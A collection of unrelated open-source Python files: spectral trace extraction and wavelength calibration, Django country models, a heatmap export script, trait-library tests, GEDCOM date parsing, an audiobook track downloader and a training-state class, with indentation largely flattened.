""" Trace a spectrum from starting position
"""
fitter=fitting.LinearLSQFitter()
if self.type == 'poly' :
mod=models.Polynomial1D(degree=self.order)
        else :
            raise ValueError('unknown fitting type: '+self.type)
nrow = hd.data.shape[0]
ncol = hd.data.shape[1]
if sc0 is None : self.sc0 = int(ncol/2)
else : self.sc0 = sc0
self.spectrum = hd[:,self.sc0]
self.spectrum.data[self.spectrum.data<0] = 0.
rows = np.arange(nrow)
ypos = np.zeros(ncol)
ysum = np.zeros(ncol)
yvar = np.zeros(ncol)
ymask = np.zeros(ncol,dtype=bool)
# we want to handle multiple traces, so make sure srows is iterable
if type(srows ) is int or type(srows) is float : srows=[srows]
oldmodel=copy.copy(self.model)
self.model=[]
if plot is not None :
plot.clear()
plot.tv(hd)
rad = self.rad-1
for irow,srow in enumerate(srows) :
print(' Tracing row: {:d}'.format(int(srow)),end='\r')
sr=copy.copy(srow)
sr=int(round(sr))
sr=hd.data[sr-rad:sr+rad+1,self.sc0].argmax()+sr-rad
# march left from center
for col in range(self.sc0,0,-1) :
# centroid
cr=sr-rad+hd.data[sr-rad:sr+rad+1,col].argmax()
ysum[col] = np.sum(hd.data[cr-rad:cr+rad+1,col])
ypos[col] = np.sum(rows[cr-rad:cr+rad+1]*hd.data[cr-rad:cr+rad+1,col]) / ysum[col]
yvar[col] = np.sum(hd.uncertainty.array[cr-rad:cr+rad+1,col]**2)
ymask[col] = np.any(hd.mask[cr-rad:cr+rad+1,col])
# if centroid is too far from starting guess, mask as bad
if np.abs(ypos[col]-sr) > rad/2. : ymask[col] = True
# use this position as starting center for next if above threshold S/N
if (not ymask[col]) & np.isfinite(ysum[col]) & (ysum[col]/np.sqrt(yvar[col]) > thresh) : sr=int(round(ypos[col]))
sr=copy.copy(srow)
sr=int(round(sr))
sr=hd.data[sr-rad:sr+rad+1,self.sc0].argmax()+sr-rad
# march right from center
for col in range(self.sc0+1,ncol,1) :
# centroid
cr=sr-rad+hd.data[sr-rad:sr+rad+1,col].argmax()
ysum[col] = np.sum(hd.data[cr-rad:cr+rad+1,col])
ypos[col] = np.sum(rows[cr-rad:cr+rad+1]*hd.data[cr-rad:cr+rad+1,col]) / ysum[col]
yvar[col] = np.sum(hd.uncertainty.array[cr-rad:cr+rad+1,col]**2)
ymask[col] = np.any(hd.mask[cr-rad:cr+rad+1,col])
if np.abs(ypos[col]-sr) > rad/2. : ymask[col] = True
# use this position as starting center for next if above threshold S/N
if (not ymask[col]) & np.isfinite(ysum[col]) & (ysum[col]/np.sqrt(yvar[col]) > thresh) : sr=int(round(ypos[col]))
cols=np.arange(ncol)
gd = np.where((~ymask) & (ysum/np.sqrt(yvar)>thresh) )[0]
model=(fitter(mod,cols[gd],ypos[gd]))
# reject outlier points (>1 pixel) and refit
res = model(cols)-ypos
gd = np.where((~ymask) & (ysum/np.sqrt(yvar)>thresh) & (np.abs(res)<1))[0]
model=(fitter(mod,cols[gd],ypos[gd]))
if len(gd) < 10 :
print(' failed trace for row: {:d}, using old model'.format(irow))
model=copy.copy(oldmodel[irow])
self.model.append(model)
if plot :
plot.ax.scatter(cols,ypos,marker='o',color='r',s=4)
plot.ax.scatter(cols[gd],ypos[gd],marker='o',color='g',s=4)
plot.ax.plot(cols,model(cols),color='m')
#plt.pause(0.05)
self.pix0=0
print("")
if plot : input(' See trace. Hit any key to continue....')
def retrace(self,hd,plot=None,thresh=20) :
""" Retrace starting with existing model
"""
self.find(hd)
srows = []
for row in range(len(self.model)) :
srows.append(self.model[row](self.sc0))
self.trace(hd,srows,plot=plot,thresh=thresh)
def find(self,hd,lags=None,plot=None) :
""" Determine shift from existing trace to input frame
"""
if lags is None : lags = self.lags
im=copy.deepcopy(hd.data)
# if we have a window, zero array outside of window
spec=im[:,self.sc0]
try:
spec[:self.rows[0]] = 0.
spec[self.rows[1]:] = 0.
except: pass
fitpeak,shift = image.xcorr(self.spectrum,spec,lags)
pixshift=(fitpeak+lags[0])[0]
print(' traces shift: ', fitpeak+lags[0])
if plot is not None :
plot.clear()
plot.tv(im)
plot.plotax1.cla()
plot.plotax1.text(0.05,0.95,'obj and ref cross-section',transform=plot.plotax1.transAxes)
plot.plotax1.plot(self.spectrum.data/self.spectrum.data.max())
plot.plotax1.plot(im[:,self.sc0]/im[:,self.sc0].max())
plot.plotax1.set_xlabel('row')
plot.plotax2.cla()
plot.plotax2.text(0.05,0.95,'cross correlation {:8.3f}'.format(pixshift),
transform=plot.plotax2.transAxes)
plot.plotax2.plot(lags,shift)
plot.plotax2.set_xlabel('lag')
plt.draw()
input(' See spectra and cross-correlation. Hit any key to continue....')
self.pix0=fitpeak+lags[0]
return fitpeak+lags[0]
def extract(self,hd,rad=None,scat=False,plot=None,medfilt=None) :
""" Extract spectrum given trace(s)
"""
if rad is None : rad=self.rad
nrows=hd.data.shape[0]
ncols=hd.data.shape[-1]
spec = np.zeros([len(self.model),hd.data.shape[1]])
sig = np.zeros([len(self.model),hd.data.shape[1]])
mask = np.zeros([len(self.model),hd.data.shape[1]],dtype=bool)
if plot is not None:
plot.clear()
plot.tv(hd)
for i,model in enumerate(self.model) :
print(' extracting aperture {:d}'.format(i),end='\r')
cr=model(np.arange(ncols))+self.pix0
icr=np.round(cr).astype(int)
rfrac=cr-icr+0.5 # add 0.5 because we rounded
rlo=[]
rhi=[]
for col in range(ncols) :
r1=icr[col]-rad
r2=icr[col]+rad
# sum inner pixels directly, outer pixels depending on fractional pixel location of trace
if r1>=0 and r2<nrows :
spec[i,col]=np.sum(hd.data[r1+1:r2,col])
sig[i,col]=np.sum(hd.uncertainty.array[r1+1:r2,col]**2)
spec[i,col]+=hd.data[r1,col]*(1-rfrac[col])
sig[i,col]+=hd.uncertainty.array[r1,col]**2*(1-rfrac[col])
spec[i,col]+=hd.data[r2,col]*rfrac[col]
sig[i,col]+=hd.uncertainty.array[r2,col]**2*rfrac[col]
sig[i,col]=np.sqrt(sig[i,col])
mask[i,col] = np.any(hd.mask[r1:r2+1,col])
if plot is not None :
rlo.append(r1)
rhi.append(r2-1)
if medfilt is not None :
boxcar = Box1DKernel(medfilt)
median = convolve(spec[i,:],boxcar,boundary='extend')
spec[i,:]/=median
sig[i,:]/=median
if plot is not None :
if i%2 == 0 : color='b'
else : color='m'
plot.ax.plot(range(ncols),cr,color='g',linewidth=3)
plot.ax.plot(range(ncols),rlo,color=color,linewidth=1)
plot.ax.plot(range(ncols),rhi,color=color,linewidth=1)
plt.draw()
if plot is not None : input(' See extraction window(s). Hit any key to continue....')
print("")
return CCDData(spec,uncertainty=StdDevUncertainty(sig),mask=mask,header=hd.header,unit='adu')
def extract2d(self,hd,rows=None,plot=None) :
""" Extract 2D spectrum given trace(s)
            Assumes all requested rows use the same trace, just offset; traces are not modeled in 2D
"""
nrows=hd.data.shape[0]
ncols=hd.data.shape[-1]
out=[]
if plot is not None:
plot.clear()
plot.tv(hd)
for model in self.model :
if plot is not None :
plot.ax.plot([0,ncols],[self.rows[0],self.rows[0]],color='g')
plot.ax.plot([0,ncols],[self.rows[1],self.rows[1]],color='g')
plt.draw()
outrows=np.arange(self.rows[0],self.rows[1])
noutrows=len(range(self.rows[0],self.rows[1]))
spec=np.zeros([noutrows,ncols])
sig=np.zeros([noutrows,ncols])
cr=model(np.arange(ncols))
cr-=cr[self.sc0]
for col in range(ncols) :
spec[:,col] = np.interp(outrows+cr[col],np.arange(nrows),hd.data[:,col])
sig[:,col] = np.sqrt(np.interp(outrows+cr[col],np.arange(nrows),hd.uncertainty.array[:,col]**2))
out.append(CCDData(spec,StdDevUncertainty(sig),unit='adu'))
if plot is not None: input(' enter something to continue....')
if len(out) == 1 : return out[0]
else : return out
def save(self,file) :
""" Save object to file
"""
try : delattr(self,'ax')
except: pass
f=open(file,'wb')
pickle.dump(self,f)
f.close()
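# Usage sketch of the Trace workflow, assuming a reduced 2D frame `im`
# (CCDData with data/uncertainty/mask) and an approximate starting row:
#   tr = Trace(inst='DIS', channel=0)
#   tr.trace(im, [550])            # fit trace(s) starting near row 550
#   spec = tr.extract(im, rad=5)   # 1D extraction along the fitted trace(s)
#   tr.save('trace.pkl')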
def mash(hd,sp=None,bks=None) :
"""
Mash image into spectra using requested window
"""
if sp is None :
sp=[0,hd.data.shape[0]]
    obj = hd.data[sp[0]:sp[1]].sum(axis=0)
if bks is not None :
back=[]
for bk in bks :
            tmp=np.median(hd.data[bk[0]:bk[1]],axis=0)
back.append(tmp)
obj-= np.mean(back,axis=0)
return obj
def wavecal(hd,file=None,wref=None,disp=None,wid=[3],rad=5,snr=3,degree=2,wcal0=None,thresh=100,type='poly'):
"""
Get wavelength solution for single 1D spectrum
"""
    # choose middle row +/- 5 rows
sz=hd.data.shape
spec=hd.data[int(sz[0]/2)-5:int(sz[0]/2)+5,:].sum(axis=0)
spec=spec-scipy.signal.medfilt(spec,kernel_size=101)
pix = np.arange(len(spec))
fig,ax = plt.subplots(2,1,sharex=True,figsize=(14,6))
ax[0].plot(spec)
# get wavelength guess from input WaveCal if given, else use wref and dispersion, else header
if wcal0 is not None :
lags=range(-300,300)
fitpeak,shift = image.xcorr(wcal0.spectrum,spec,lags)
wnew=copy.deepcopy(wcal0)
wnew.pix0 = wcal0.pix0+shift.argmax()+lags[0]
print(' Derived pixel shift from input wcal0: ',shift.argmax()+lags[0])
wav=wnew.wave(pix)
else :
# get dispersion guess from header cards if not given in disp
if disp is None: disp=hd.header['DISPDW']
if wref is not None :
w0=wref[0]
pix0=wref[1]
wav=w0+(pix-pix0)*disp
else:
w0=hd.header['DISPWC']
pix0=sz[1]/2
wav=w0+(pix-pix0)*disp
ax[1].plot(wav,spec)
# open file with wavelengths and read
f=open(file,'r')
lines=[]
for line in f :
if line[0] != '#' :
w=float(line.split()[0])
name=line[10:].strip()
lpix=abs(w-wav).argmin()
if lpix > 1 and lpix < sz[1]-1 :
ax[0].text(lpix,0.,'{:7.1f}'.format(w),rotation='vertical',va='top',ha='center')
lines.append(w)
lines=np.array(lines)
f.close()
# get centroid around expected lines
cents=[]
for line in lines :
peak=abs(line-wav).argmin()
if (peak > rad) and (peak < sz[1]-rad) and (spec[peak-rad:peak+rad].max() > thresh) :
print(peak,spec[peak-rad:peak+rad].max())
cents.append((spec[peak-rad:peak+rad]*np.arange(peak-rad,peak+rad)).sum()/spec[peak-rad:peak+rad].sum())
cents=np.array(cents)
print(' cents:', cents)
waves=[]
weight=[]
print(' Centroid W0 Wave')
for cent in cents :
w=wav[int(cent)]
ax[0].plot([cent,cent],[0,10000],'k')
print(' {:8.2f}{:8.2f}{:8.2f}'.format(cent, w, lines[np.abs(w-lines).argmin()]))
waves.append(lines[np.abs(w-lines).argmin()])
weight.append(1.)
waves=np.array(waves)
weight=np.array(weight)
# set up new WaveCal object
pix0 = int(sz[1]/2)
    wcal = WaveCal(degree=degree,type=type,pix0=pix0)
    wcal.set_spectrum(spec)
# iterate allowing for interactive removal of points
done = False
ymax = ax[0].get_ylim()[1]
while not done :
gd=np.where(weight>0.)[0]
bd=np.where(weight<=0.)[0]
wcal.fit(cents[gd],waves[gd],weights=weight[gd])
# plot
ax[1].cla()
ax[1].plot(cents[gd],wcal.wave(cents[gd])-waves[gd],'go')
if len(bd) > 0 : ax[1].plot(cents[bd],wcal.wave(cents[bd])-waves[bd],'ro')
diff=wcal.wave(cents[gd])-waves[gd]
ax[1].set_ylim(diff.min()-1,diff.max()+1)
for i in range(len(cents)) :
ax[1].text(cents[i],wcal.wave(cents[i])-waves[i],'{:2d}'.format(i),va='top',ha='center')
if weight[i] > 0 :
ax[0].plot([cents[i],cents[i]],[0,ymax],'g')
else :
ax[0].plot([cents[i],cents[i]],[0,ymax],'r')
plt.draw()
# get input from user on lines to remove
for i in range(len(cents)) :
print(' {:3d}{:8.2f}{:8.2f}{:8.2f}{:8.2f}{:8.2f}'.format(
i, cents[i], wcal.wave(cents[i]), waves[i], waves[i]-wcal.wave(cents[i]),weight[i]))
        print('  rms: {:8.2f} Angstroms'.format(diff.std()))
i = input('enter ID of line to remove (-n for all lines<n, +n for all lines>n, return to continue): ')
        if i == '' :
done = True
elif '+' in i :
weight[int(i)+1:] = 0.
elif '-' in i :
weight[0:abs(int(i))] = 0.
elif int(i) >= 0 :
weight[int(i)] = 0.
else :
print('invalid input')
plt.close()
return wcal.wave(pix),wcal
def fluxcal(obs,wobs,file=None) :
"""
flux calibration
"""
fluxdata=ascii.read(file)
stan=np.interp(wobs,fluxdata['col1'],fluxdata['col2'])
return stan/obs
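# Usage sketch: fluxcal returns the multiplicative correction that maps observed
# standard-star counts onto the tabulated flux; 'standard.dat' is a hypothetical
# two-column (wavelength, flux) table:
#   corr = fluxcal(obs_counts, wave, file='standard.dat')
#   calibrated = science_counts * corr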
def trace(hd,apertures=None,pix0=1024) :
""" Get all traces
apertures is a list of row numbers at pixel 1024
"""
alltr=[]
for i in range(len(apertures)) :
tr=Trace()
print('tracing aperture {:d}'.format(i),end='\r')
sr=apertures[i]
        tr.trace(hd,sr,sc0=pix0)
alltr.append(tr)
return alltr
def extract(hd,apertures) :
""" Do all extractions
"""
spec = np.zeros([len(apertures),hd.data.shape[1]])
for i,order in enumerate(apertures) :
print('extracting aperture {:d}'.format(i),end='\r')
spec[i] = order.extract(hd)
return spec
# --- countries/models.py | Valuehorizon/valuehorizon-countries | Python | MIT | 3,165 bytes | 3 stars ---
from django.db import models
from forex.models import Currency
class Country(models.Model):
"""
Represents a country, such as the US, or Mexico.
"""
name = models.CharField(max_length=255, blank=True, null=True, help_text="Official Country name (ISO Full name)")
currency = models.ManyToManyField(Currency, help_text="Official currencies for this country. More than one currency is possible")
symbol_alpha2_code = models.CharField(help_text="ISO 3166-1 alpha-2 symbol", max_length=2, unique=True)
symbol_alpha3_code = models.CharField(help_text="ISO 3166-1 alpha-3 symbol", max_length=3, unique=True)
is_independent = models.BooleanField()
numeric_code = models.PositiveSmallIntegerField()
remark_1 = models.TextField(blank=True)
remark_2 = models.TextField(blank=True)
remark_3 = models.TextField(blank=True)
territory_name = models.TextField(blank=True)
ISO_STATUS_CHOICES = (
(u'EXR', u'Exceptionally reserved'),
(u'FRU', u'Formerly used'),
(u'INR', u'Indeterminately reserved'),
(u'OFF', u'Officially assigned'),
(u'TRR', u'Transitionally reserved'),
(u'UND', u'Unassigned'),
)
iso_status = models.CharField(max_length=3, choices=ISO_STATUS_CHOICES, default="UND")
# Additional helpful fields
common_name = models.CharField(max_length=255, unique=True, help_text="Common Country name")
in_name = models.CharField(max_length=255, help_text="The name of the country after the word 'in'. Useful for Autogeneration.")
class Meta:
verbose_name_plural = 'Countries'
verbose_name = 'Country'
ordering = ['name', ]
def __unicode__(self):
return u'%s' % (unicode(self.common_name))
class Region(models.Model):
"""
    Represents a region, such as Latin America or Europe.
"""
name = models.CharField(max_length=255, unique=True)
country = models.ManyToManyField(Country)
symbol = models.CharField(max_length=4)
class Meta:
verbose_name_plural = 'Regions'
verbose_name = 'Region'
ordering = ['name', ]
def __unicode__(self):
return u'%s' % (unicode(self.name))
class City(models.Model):
"""
Represents a city within a country
"""
name = models.CharField(max_length=255)
symbol = models.CharField(max_length=255, blank=True)
country = models.ForeignKey(Country)
class Meta:
verbose_name_plural = 'Cities'
verbose_name = 'City'
ordering = ['name', ]
unique_together = (("name", "country"), )
def __unicode__(self):
return u'%s, %s' % (unicode(self.name), unicode(self.country.name))
class Government(models.Model):
"""
Represents a government of a country, such as the
'Government of Australia'.
"""
name = models.CharField(max_length=255)
country = models.ForeignKey(Country)
class Meta:
verbose_name_plural = 'Governments'
verbose_name = 'Government'
ordering = ['name', ]
unique_together = (("name", "country"), )
def __unicode__(self):
return u'%s' % (unicode(self.name))
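# Usage sketch, assuming the usual Django ORM conventions (field values are
# illustrative):
#   usa = Country.objects.create(name='United States of America',
#                                common_name='United States',
#                                symbol_alpha2_code='US',
#                                symbol_alpha3_code='USA',
#                                is_independent=True,
#                                numeric_code=840,
#                                in_name='the United States')
#   Region.objects.get(name='North America').country.add(usa)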
# --- export.py | philtgun/mediaeval-emothemes-explorer | Python | MIT | 920 bytes | 1 star ---
import argparse
from pathlib import Path
import json
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib import rcParams
def main(input_file: Path, output_file: Path) -> None:
with input_file.open('r') as fp:
data = json.load(fp)
plt.figure(figsize=(20, 13))
rcParams['font.family'] = 'serif'
rcParams['font.serif'] = 'Times New Roman'
plt.tick_params(left=False, bottom=False)
sns.heatmap(data['z'][::-1], xticklabels=data['x'], yticklabels=data['y'][::-1], cmap='mako_r') # YlGnBu_r, mako_r
plt.savefig(output_file, bbox_inches='tight', dpi=150)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('input', type=Path, help='Input JSON file, generated by process.py')
parser.add_argument('output', type=Path, help='Output file containing the figure')
args = parser.parse_args()
main(args.input, args.output)
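# Usage sketch: the script expects a JSON heatmap spec produced by process.py
# (keys 'x', 'y' and 'z'); file names below are illustrative:
#   python export.py heatmap.json heatmap.png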
# --- tests/test_cascade_call.py | xyloon/ptrait | Python | MIT | 3,436 bytes ---
from ptrait import TraitExtends
import copy
from pytest_assertutil import assert_equal
class IntfA:
@classmethod
@TraitExtends.mark
def a_classmethodA(cls, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 1
return args, kwa
@classmethod
@TraitExtends.mark
def a_classmethodC(cls, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@staticmethod
@TraitExtends.mark
def a_staticmethodA(*args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 1
return args, kwa
@staticmethod
@TraitExtends.mark
def a_staticmethodC(*args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@TraitExtends.mark
def a_instancemethodA(self, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 1
return args, kwa
@TraitExtends.mark
def a_instancemethodC(self, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
class IntfB:
@classmethod
@TraitExtends.mark
def a_classmethodB(cls, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 2
return args, kwa
@classmethod
@TraitExtends.mark
def a_classmethodC(cls, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@staticmethod
@TraitExtends.mark
def a_staticmethodB(*args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 2
return args, kwa
@staticmethod
@TraitExtends.mark
def a_staticmethodC(*args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@TraitExtends.mark
def a_instancemethodB(self, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 2
return args, kwa
@TraitExtends.mark
def a_instancemethodC(self, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@TraitExtends.cascade(IntfA, IntfB)
class A:
pass
def test_cascade_call_instanceA():
assert_equal(
((), {'a': 1}),
A().a_instancemethodA()
)
def test_cascade_call_instanceB():
assert_equal(
((), {'a': 2}),
A().a_instancemethodB()
)
def test_cascade_call_instanceC():
assert_equal(
((), {'a': 3}),
A().a_instancemethodC()
)
def test_cascade_call_staticmethodA():
assert_equal(
((), {'a': 1}),
A.a_staticmethodA()
)
def test_cascade_call_staticmethodB():
assert_equal(
((), {'a': 2}),
A.a_staticmethodB()
)
def test_cascade_call_staticmethodC():
assert_equal(
((), {'a': 3}),
A.a_staticmethodC()
)
def test_cascade_call_classmethodA():
assert_equal(
((), {'a': 1}),
A.a_classmethodA()
)
def test_cascade_call_classmethodB():
assert_equal(
((), {'a': 2}),
A.a_classmethodB()
)
def test_cascade_call_classmethodC():
assert_equal(
((), {'a': 3}),
A.a_classmethodC()
)
# --- life_line_chart/GedcomParsing.py | mustaqimM/life_line_chart | Python | MIT | 7,220 bytes ---
import datetime
import re
import os
import logging
import json
_months = [
"JAN",
"FEB",
"MAR",
"APR",
"MAY",
"JUN",
"JUL",
"AUG",
"SEP",
"OCT",
"NOV",
"DEC"
]
_precision = [
'ABT',
'CAL',
'EST',
'AFT',
'BEF'
]
_date_expr = re.compile('(?:(' + '|'.join(_precision) + ') )?(?:(\\d+) )?(?:(' + '|'.join(_months) + ') )?(\\d{4})')
_interval_expr = re.compile('(BET) (?:(\\d+) (' + '|'.join(_months) + ') )?(\\d{4}) AND (?:(\\d+) (' + '|'.join(_months) + ') )?(\\d{4})')
_max_days = {
1:31,
2:29,
3:31,
4:30,
5:31,
6:30,
7:31,
8:31,
9:30,
10:31,
11:30,
12:31
}
def get_date_dict_from_tag(parent_item, tag_name):
"""
read the date from a gedcom tag
Args:
parent_item (dict): parent event node to output the result
tag_name (str): event type
"""
# TODO: Implement BET = Between
try:
if tag_name not in parent_item:
return
if 'DATE' not in parent_item[tag_name]:
return
comment = None
precision = ''
content = parent_item[tag_name]['DATE']['tag_data']
date_info = _date_expr.match(content)
if date_info is None:
date_info = _interval_expr.match(content)
if date_info.group(1) == 'EST':
comment = 'Estimated'
elif date_info.group(1) == 'ABT':
comment = 'About'
elif date_info.group(1) == 'CAL':
comment = 'Calculated'
elif date_info.group(1) == 'AFT':
comment = 'After'
elif date_info.group(1) == 'BEF':
comment = 'Before'
elif date_info.group(1) == 'BET':
comment = 'Between'
elif date_info.group(2) is None and date_info.group(3) is None and date_info.group(4) is not None:
comment = 'YearPrecision'
month_max_, day_max_ = 12, 31
month_min_, day_min_ = 1, 1
year_min, year_max = None, None
month_max, day_max = None, None
month_min, day_min = None, None
if date_info.group(1) == 'BET':
if date_info.group(7):
year_max = int(date_info.group(7))
if date_info.group(6):
month_max = _months.index(date_info.group(6)) + 1
if date_info.group(5):
day_max = int(date_info.group(5))
if date_info.group(4):
year_min = int(date_info.group(4))
if not year_max:
year_max = year_min
precision = 'y' + precision
if date_info.group(3):
month_min = _months.index(date_info.group(3)) + 1
if not month_max:
month_max = month_min
precision = 'm' + precision
if date_info.group(2):
day_min = int(date_info.group(2))
if not day_max:
day_max = day_min
precision = 'd' + precision
if date_info.group(1) == 'AFT':
year_max = year_min + 15
elif date_info.group(1) == 'BEF':
year_min = year_max - 15
if not month_max: month_max = month_max_
if not month_min: month_min = month_min_
if not day_max: day_max = day_max_
if not day_min: day_min = day_min_
day_max = min(_max_days[month_max], day_max)
date_min = datetime.datetime(year_min, month_min, day_min, 0, 0, 0, 0)
try:
date_max = datetime.datetime(year_max, month_max, day_max, 0, 0, 0, 0)
        except ValueError:
            if month_max == 2:
                # day 29 is invalid in non-leap years; fall back to Feb 28
                date_max = datetime.datetime(year_max, month_max, 28, 0, 0, 0, 0)
            else:
                raise
if tag_name in ['BURI', 'DEAT']:
# if unknown move to the end of the year
date = date_max
else:
# if unknown move to the beginning of the year
date = date_min
return {
'tag_name': tag_name,
'date': date,
'ordinal_value': date.toordinal(),
'ordinal_value_max': date_max.toordinal(),
'ordinal_value_min': date_min.toordinal(),
'comment': comment,
'precision' : precision
}
    except:
        # malformed or missing date information: fall through and return None
        pass
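# Usage sketch: for a GEDCOM individual node containing a tag like
#   1 BIRT
#   2 DATE ABT 12 MAR 1850
# the call get_date_dict_from_tag(indi_node, 'BIRT') would return (roughly)
#   {'tag_name': 'BIRT', 'date': datetime.datetime(1850, 3, 12),
#    'comment': 'About', 'precision': 'dmy', 'ordinal_value': ...,
#    'ordinal_value_min': ..., 'ordinal_value_max': ...}
# where indi_node is a hypothetical parsed-GEDCOM dict in this module's format.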
def _get_relevant_events(database_indi, individual_id, target):
parent_item = database_indi[individual_id].get('BIRT')
if parent_item:
target['birth'] = get_date_dict_from_tag(
database_indi[individual_id], 'BIRT')
if target['birth'] is None:
target.pop('birth')
parent_item = database_indi[individual_id].get('CHR')
if parent_item:
target['christening'] = get_date_dict_from_tag(
database_indi[individual_id], 'CHR')
if target['christening'] is None:
target.pop('christening')
parent_item = database_indi[individual_id].get('BAPM')
if parent_item:
target['baptism'] = get_date_dict_from_tag(
database_indi[individual_id], 'BAPM')
if target['baptism'] is None:
target.pop('baptism')
parent_item = database_indi[individual_id].get('DEAT')
if parent_item:
target['death'] = get_date_dict_from_tag(
database_indi[individual_id], 'DEAT')
if target['death'] is None:
target.pop('death')
parent_item = database_indi[individual_id].get('BURI')
if parent_item:
target['burial'] = get_date_dict_from_tag(
database_indi[individual_id], 'BURI')
if target['burial'] is None:
target.pop('burial')
if 'birth' in target:
target['birth_or_christening'] = target['birth']
elif 'birth_or_christening' not in target and 'christening' in target:
target['birth_or_christening'] = target['christening']
elif 'birth_or_christening' not in target and 'baptism' in target:
target['birth_or_christening'] = target['baptism']
else:
target['birth_or_christening'] = None
if 'death' in target:
target['death_or_burial'] = target['death']
elif 'death_or_burial' not in target and 'burial' in target:
target['death_or_burial'] = target['burial']
else:
target['death_or_burial'] = None
def estimate_marriage_date(family):
"""
If the marriage date is unknown, then estimate the date by assuming:
- the marriage took place before the first child was born
Args:
family (BaseFamily): family instance
"""
if family.marriage is None:
children_events = []
for child in family.children_individual_ids:
child_events = {}
_get_relevant_events(family._database_indi, child, child_events)
if child_events['birth_or_christening']:
children_events.append(child_events['birth_or_christening'])
# unsorted_marriages = [family._instances[('f',m)] for m in family._marriage_family_ids]
if len(children_events) > 0:
sorted_pairs = list(zip([(m['ordinal_value'], i) for i, m in enumerate(
children_events)], children_events))
sorted_pairs.sort()
family.marriage = sorted_pairs[0][1]
# --- lib/HimalayanDownloader.py | oldfatcrab/Himalayan | Python | MIT | 4,020 bytes ---
from HTMLParser import HTMLParser
import json
from os import makedirs
from os.path import abspath, dirname, exists, join, normpath
import pycurl
import Queue
import re
import requests
import tempfile
import urllib2
class HimalayanDownloader:
def __init__(self, eBookUrl, logger):
self._logger = logger
self._eBookUrl = eBookUrl
self._failedTracksQueue = None
self._downloadQueue = Queue.Queue()
self._completedQueue = Queue.Queue()
self._maxTrial = 10
self._trial = 0
self._hp = HTMLParser()
self._trackUrlDir = 'http://www.ximalaya.com/tracks/'
self._bookName = self.getBookName()
def getBookName(self):
response = urllib2.urlopen(self._eBookUrl)
html = response.read()
pattern = re.compile('<h1>(.*?)</h1>', re.S)
rawName = re.findall(pattern, html)[0].decode('utf-8')
return self._hp.unescape(rawName).replace(':', '_')
def download(self):
self._logger.info('Downloading book <<' + self._bookName + '>>')
currPath = join(dirname(abspath(__file__)), '..')
bookPath = normpath(join(currPath, self._bookName))
self._logger.info('Files can be found in: ' + bookPath)
if not exists(bookPath):
makedirs(bookPath)
self.fetchTracks()
while self._trial < self._maxTrial:
self._failedTracksQueue = Queue.Queue()
while not self._downloadQueue.empty():
track = self._downloadQueue.get()
self.downloadTrack(track[0], track[1])
if self._failedTracksQueue.empty():
break
else:
self._downloadQueue = self._failedTracksQueue
                self._trial += 1
self._logger.info('Finished downloading book <<' + self._bookName + '>>')
return self._completedQueue
def downloadTrack(self, url, fileName):
self._logger.info('Downloading track: ' + fileName)
self._logger.debug('Track URL: ' + url)
tmpFileName = url.split('/')[-1]
tmpFilePath = normpath(join(tempfile.gettempdir(), tmpFileName))
with open(tmpFilePath, 'wb') as f:
c = pycurl.Curl()
c.setopt(c.URL, url)
c.setopt(c.WRITEDATA, f)
try:
c.perform()
except pycurl.error as e:
self._logger.error('ERROR occurred: ' + e.message)
self._logger.debug('Adding "' + fileName + '" to re-download tasks')
self._failedTracksQueue.put((url, fileName))
else:
c.close()
self._completedQueue.put((tmpFilePath, self._bookName, fileName))
def fetchTracks(self):
pageNum = 1
        trackQueue = Queue.Queue()
while True:
pageUrl = self._eBookUrl + '?page=%d' % pageNum
self._logger.debug('Fetching page: ' + pageUrl)
response = urllib2.urlopen(pageUrl)
html = response.read()
self._logger.debug('Analyzing page: ' + pageUrl)
pattern = re.compile('<a class="title" href="(.*?)" hashlink title="(.*?)">', re.S)
results = re.findall(pattern, html)
if not results:
break
for result in results:
trackQueue.put(result)
pageNum += 1
indexLength = len(str(trackQueue.qsize()))
index = 0
while not trackQueue.empty():
index += 1
track = trackQueue.get()
jsonUrl = self._trackUrlDir + track[0].split('sound/')[-1] + '.json'
self._logger.debug('Loading JSON: ' + jsonUrl)
resp = requests.get(url=jsonUrl)
data = json.loads(resp.text)
fileName = self._bookName + '_' + str(index).zfill(indexLength) + '_'
fileName += self._hp.unescape(track[1].decode('utf-8')).replace(':', '_')
url = data['play_path']
self._downloadQueue.put((url, fileName))
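# Usage sketch, assuming a standard logging.Logger and a ximalaya album URL
# (the URL below is an illustrative placeholder):
#   import logging
#   logger = logging.getLogger('himalayan')
#   dl = HimalayanDownloader('http://www.ximalaya.com/.../album/...', logger)
#   completed = dl.download()   # Queue of (tmp_path, book_name, track_name)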
# --- dl/state.py | eric-erki/Prometheus | Python | MIT | 820 bytes ---
from collections import defaultdict

from prometheus.utils.misc import FrozenClass


class RunnerState(FrozenClass):
    """
    An object that is used to pass internal state during train/valid/infer.
    """

    def __init__(self, **kwargs):
        # data
        self.device = None
        self.input = None
        self.output = None
        self.loader = None
        self.loader_mode = None

        # counters
        self.bs = 0
        self.step = 0
        self.epoch = 0

        # metrics
        self.lr = defaultdict(lambda: 0)
        self.momentum = defaultdict(lambda: 0)
        self.loss = None
        self.epoch_metrics = None
        self.best_metrics = None

        # other
        self.is_train = False

        for k, v in kwargs.items():
            setattr(self, k, v)

        self._freeze()
